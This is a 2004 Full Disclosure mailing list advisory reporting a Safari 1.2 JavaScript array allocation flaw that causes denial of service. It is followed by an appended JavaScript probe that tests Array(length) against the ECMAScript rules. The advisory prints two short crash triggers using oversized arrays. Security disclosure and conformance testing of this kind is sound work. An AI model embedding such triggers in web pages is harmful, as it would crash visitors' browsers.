Full Disclosure mailing list archives

Safari javascript array overflow


From: kang <kang () insecure ws>
Date: Sat, 06 Mar 2004 22:40:54 +0100


http://www.insecure.ws/article.php?story=2004021918172533

A problem exists in the way the Safari JavaScript engine allocates Arrays.
For example, allocating an array that is too big and writing into it will
segfault Safari. There is no known way to execute remote code with this
vulnerability as of the date of this advisory.
Konqueror doesn't seem to be vulnerable.


--

Adv: safari_0x03
Release Date: 06/04/04
Affected Products: Safari <= 1.2
Impact: Denial of Service, Possible exploitation
Severity: Remote, medium.
Vendor: Notified (19/03/04)
Author: kang, kang () insecure ws


Simple allocation management error trigger:

    var a = new Array(99999999999999999999999);
    a[0+5]="AAAAA";


Another possibility...;)

var bam = new Array(0x23000000);
bam.sort(new Function("return 1"));


There are some other possibilities :>

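Added example, not part of the advisory above and not Safari code: a regression probe that compares what the running engine does for Array(length) against what ECMAScript requires, using the two lengths from the advisory plus the uint32 boundaries. The function names and the sample list are assumptions made for this illustration.

```javascript
// Added example: conformance probe for Array(length), not from the advisory.
// ECMAScript requires ToUint32(len) === len for a numeric length argument;
// any other number must throw RangeError instead of creating the array.
const MAX_ARRAY_LENGTH = 2 ** 32 - 1;

// What the specification requires for a single numeric argument.
function expectedOutcome(len) {
  return (len >>> 0) === len ? "ok" : "RangeError";
}

// What the running engine does: construct, check the length, then write one
// element and read it back (the same shape as the first trigger).
function observedOutcome(len) {
  try {
    const a = new Array(len);
    if (a.length !== len) return "wrong-length";
    a[5] = "AAAAA";
    return a[5] === "AAAAA" ? "ok" : "bad-readback";
  } catch (e) {
    return e instanceof RangeError ? "RangeError" : "other:" + e.name;
  }
}

// Compare expectation and observation for every sample length.
function checkEngine(samples) {
  return samples.map((len) => {
    const expected = expectedOutcome(len);
    const observed = observedOutcome(len);
    return { len, expected, observed, conforms: expected === observed };
  });
}

// Constructed sample set: the advisory's two lengths plus boundary values.
const SAMPLES = [
  99999999999999999999999, // not a uint32: must be rejected
  0x23000000,              // valid uint32: must yield a usable sparse array
  0, MAX_ARRAY_LENGTH, MAX_ARRAY_LENGTH + 1, -1, 1.5, NaN,
];

for (const r of checkEngine(SAMPLES)) {
  console.log(String(r.len).padEnd(12), r.expected.padEnd(10), r.observed,
              r.conforms ? "" : "<-- NON-CONFORMING");
}
```

A crash of the interpreter itself, rather than a NON-CONFORMING line, is the failure mode the advisory describes.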